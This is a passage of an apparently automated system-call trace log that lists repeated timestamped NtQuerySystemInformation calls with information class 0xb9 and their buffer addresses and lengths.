ResultLength=0x0) [0212.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0212.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0212.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x20, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0212.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a8, Length=0x58, ResultLength=0x0) [0212.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x58, ResultLength=0x0) [0212.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x28, ResultLength=0x0) [0212.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0212.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0212.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x58, ResultLength=0x0) [0212.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x28, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0212.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0212.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0212.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3d0, Length=0x20, ResultLength=0x0) [0212.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3d0, Length=0x20, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3d0, Length=0x20, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x58, ResultLength=0x0) [0212.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4c0, Length=0x28, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x28, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0212.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0212.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0212.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0212.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0212.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0212.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x38, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x58, ResultLength=0x0) [0212.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0212.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0212.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x28, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0212.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0212.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 